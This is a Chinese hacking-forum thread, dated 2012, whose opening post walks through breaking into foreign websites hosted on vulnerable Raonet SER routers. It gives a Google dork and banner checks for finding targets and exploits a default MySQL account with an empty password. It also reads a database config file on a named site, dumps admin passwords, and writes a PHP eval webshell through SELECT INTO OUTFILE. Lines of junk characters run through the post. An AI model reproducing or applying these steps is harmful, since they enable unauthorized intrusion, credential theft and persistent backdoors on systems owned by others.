找回密码
 立即注册
查看: 3646|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  寻找存在漏洞的路由器方法:
4 J2 l8 N, S4 D8 Q8 k( f0 u4 \/ {  s$ j" k  i: ^! J. @
1:google搜索'Raonet Subscriber Ethernet Router'
) h: j. M) z4 K) |/ ^1 ~. n
7 T" l% d4 g( R1 p+ T# S) V2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001& k- n; S! h# {# o4 L$ b
/ H1 n' Y) O" l7 i, _& J
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
$ o8 I+ X- ?, ]6 X1 T0 D
- j. z1 k, @6 q' o, V1 C//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
1 [! J' P; o' z. |* v/ C/ h7 i
# K8 U+ I1 N) e( V0 p# n - u; _: ?" q9 s; [" a0 D6 G0 f
+ n* y% x! a1 t3 ~9 R$ q
入侵步骤:
2 _( J4 G1 B9 \/ R7 E" i( Z. F5 q2 G: ]1 N# i+ l
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
! d- s5 d$ V) t5 Y- Y9 \" ?, f, q4 {7 f$ {7 S! D& V' `* i9 V
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
3 y& W2 C! d7 K" V1 y: Q* T3:得到密码后连接,查看GUI管理密码:
: A: j: z5 q$ r) p7 J3 Huse ser_500
1 B5 z$ g6 m* E. W7 oselect id,passwd from user;- w( K+ |; V8 J8 @
4:通过数据库写入webshell,执行命令:  E1 ~! E0 k8 Q. X" U
use mysql;
' g8 K% n; u% ~6 u7 Ecreate table ok(cmd TEXT);. M1 i8 ?: O5 U- ^
insert into ok values("<?php @eval($_POST[cmd])?>");
/ y& q( }3 J! k3 T1 m$ iselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";" }+ H* v' I4 c  }" ^; d1 B0 }$ U
drop table ok;
8 n5 r5 H9 g& y/ A# s
5 l) }9 N( V: H7 H* Q* n5:连接后门shell.php
  {' {5 Y& `9 T# {
' \( A0 O+ r. f2 j- i: F; v6. 搞定!
. w6 W8 r2 c- _, B3 }, N: t) P5 e3 t5 D5 ~' J
回复

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表